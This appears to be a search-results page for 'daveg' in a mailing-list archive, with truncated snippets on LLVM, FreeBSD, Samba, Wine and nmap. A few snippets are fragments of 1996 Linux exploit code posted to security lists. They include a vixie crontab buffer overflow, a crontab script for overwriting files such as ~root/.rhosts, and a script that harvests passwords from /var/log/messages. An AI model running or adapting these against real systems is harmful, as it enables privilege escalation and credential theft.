search for: daveg

Here are my preliminary tests: 5.2.18 is vulnerable (stock Redhat 3.0.3) 5.3.12 does not appear vulnerable (stock Redhat 4.0, I think) Dave G. <daveg@escape.com> http://www.escape.com/~daveg

...atis in /etc/crontab. Severely limited as you can only # overwrite one file a week with the whatis database. # # If someone is really clever, maybe they can overwrite ~root/.rhosts # and try IP spoofing in from ''cat'' as user ''(1)'' <smirk> # # Dave G. # <daveg@escape.com> # http://www.escape.com/~daveg # 12/21/96 NUMLINKS=100 # I dont feel like guessing. This will hit it. # Admittedly, it has as much style as a clumsy leper. if [ -x /usr/bin/crontab ] ; then cat << ! > evil_cron # These are for 3.0.3 19 03 * * 1 $PWD/overwr...

...A1 and 6.1-BETA4. None have successfully booted on these boards. Strangely enough, i386 boots fine, APIC and all. Dave. -- ============================================================================ |David Gilbert, Independent Contractor. | Two things can be | |Mail: dave@daveg.ca | equal if and only if they | |http://daveg.ca | are precisely opposite. | =========================================================GLO================

Hello! Attempt to scan a network with any method except plain ping results in an error: truss nmap -sT -p 21 '172.19.17.*' [...] sendto(0x4,0x8094200,0,0x0,{ AF_INET 172.19.17.0:0 },0x10) ERR#49 'Can't assign requested address' [...] What's strange that man on send(2) doesn't state that EADDRNOTAVAIL can ever be returned from sendto(). Quick look at nmap's site

...body comment on how much needs to be done to implement these ? Some applications seem to use this to communicate with a license manager process - even freely available product catalogs that apparently create a pro forma license file during the installation process. Martin -- Dr. Martin Kroeker, daVeg GmbH Darmstadt CAD/CAM/CAQ mk@daveg.com Precision Powered by Penguins

Hi, I tried to run viewdraw application (schematic capture from Innoveda's eProduct Designer). The problem that I am stuck with is making wine/application to recognize dongle. Here is an error: vsec: Error 8037: License node restriction does not match client's node for product Viewdraw. +vsec: Error 8031: Flex/LM Error: Invalid host (-9,57). Any help is appreciated. Genady Veytsman

...%s", tty); In order to pass in the evil buffer, one has to get by either search_utmp() or utmp_chk(). Both of these check utmp to see if it can find a tty & user pair that matches the ones you requested. [mod: David Holland acknowledges this. -- REW] Did I miss something? Dave G. <daveg@escape.com> http://www.escape.com/~daveg

/* vixie crontab buffer overflow for RedHat Linux * * I dont think too many people know that redhat uses vixie crontab. * I didn''t find this, just exploited it. * * * Dave G. * <daveg@escape.com> * http://www.escape.com/~daveg * * */ #include <stdio.h> #include <sys/types.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #define DEFAULT_OFFSET -1240 #define BUFFER_SIZE 100 /* MAX_TEMPSTR is 100 */ #defin...

...lackware 3.0) # /var/log/messages is world readable. If a user types in his password at # the login prompt, it may get logged to /var/log/messages. # # I could swear this topic has been beaten to death, but I still see this # problem on every linux box I have access to. # # Dave G. # 12/06/96 # <daveg@escape.com> # http://www.escape.com/~daveg echo Creating Dictionary from /var/log/messages, stored in /tmp/messages.dict.$$ grep "LOGIN FAILURE" /var/log/messages | cut -d'','' -f2 | cut -c2- | sort | uniq >> /tmp/messages.dict.$$ if [ ! -e ./scrack ] then e...

> -------- Original Message -------- > Subject: dvd+rw-format -force problem > Date: Thu, 31 Jul 2003 21:30:00 +0200 > From: Melvyn Sopacua <freebsd-stable@webteckies.org> > Organization: WebTeckies.org > To: stable@freebsd.org > > I haven't felt the need to fully blank a DVD+RW for a while untill today. Formally speaking blanking is not appicable to DVD+RW.

On Wed, Jan 4, 2012 at 12:10 PM, David Gardner <daveg at xmos.com> wrote: > Jianzhou Zhao <jianzhou <at> seas.upenn.edu> writes: >> The documents say that all the aa analysis are chained, and give an >> example like opt -basicaa -ds-aa -licm. In this case, does ds-aa >> automatically call basicaa for the case when d...

...s is on 4.8-STABLE (cvsup'd this afternoon). Dave. -- ============================================================================ |David Gilbert, Velocet Communications. | Two things can only be | |Mail: dgilbert@velocet.net | equal if and only if they | |http://daveg.ca | are precisely opposite. | =========================================================GLO================

[Mod: Sent to linux-security instead of linux alert -- alex] Dave G. <daveg@ESCAPE.COM> wrote: > /* vixie crontab buffer overflow for RedHat Linux > * > * I dont think too many people know that redhat uses vixie crontab. > * I didn''t find this, just exploited it. The vulnerability involves an unguarded sscanf call in env.c. Enlarging the buff...

I run "net join -U Administrator -w CISL.CO.UK -d10" which fails to join the domain with the error "Unable to find a suitable server" net appears to fail because it cannot load a file that does not exist. [2008/01/13 09:19:52, 3] libads/ldap.c:ads_connect(394) Connected to LDAP server 10.50.20.2 [2008/01/13 09:19:52, 10] intl/lang_tdb.c:lang_tdb_init(138) lang_tdb_init:

Jianzhou Zhao <jianzhou <at> seas.upenn.edu> writes: > At this level, I can understand how it works. I was confused because I > have been looking at the source code for implementing them. All the > globalmodref, scev-aa, steenaa and ds-aa are only subclasses of the > AliasAnalysis class, so I cannot see how ds-aa can automatically call > basicaa. There's some magic

Jianzhou Zhao <jianzhou <at> seas.upenn.edu> writes: > The documents say that all the aa analysis are chained, and give an > example like opt -basicaa -ds-aa -licm. In this case, does ds-aa > automatically call basicaa for the case when ds-aa can only return > MayAlias? This looks magic to me. Is this handled by AnalysisGroup > magically? As I understand it, the

On Dec 14, 2011, at 7:09 AM, David Gardner wrote: > I'm attempting to add some support for hoisting/sinking of memory-using > intrinsics in loops, and so I want to use MemoryDependenceAnalysis in > LICM, but when I modify getAnalysisUsge to include this : > > virtual void getAnalysisUsage(AnalysisUsage &AU) const { > AU.setPreservesCFG(); >

On Tue, Jan 3, 2012 at 4:55 PM, Chris Lattner <clattner at apple.com> wrote: > On Jan 3, 2012, at 1:53 PM, Jianzhou Zhao wrote: >> I see. I asked the question because LLVM provides several alias >> analysis, and I was wondering how to decide which one should be used >> for compiling most programs. >> >> I think the basicaa is the default one, but by looking

Everyone: We're starting to see a rash of password guessing attacks via SSH on all of our exposed BSD servers which are running an SSH daemon. They're coming from multiple addresses, which makes us suspect that they're being carried out by a network of "bots" rather than a single attacker. But wait... there's more. The interesting thing about these attacks is that

I'm attempting to add some support for hoisting/sinking of memory-using intrinsics in loops, and so I want to use MemoryDependenceAnalysis in LICM, but when I modify getAnalysisUsge to include this : virtual void getAnalysisUsage(AnalysisUsage &AU) const { AU.setPreservesCFG(); AU.addRequired<DominatorTree>(); AU.addRequired<LoopInfo>();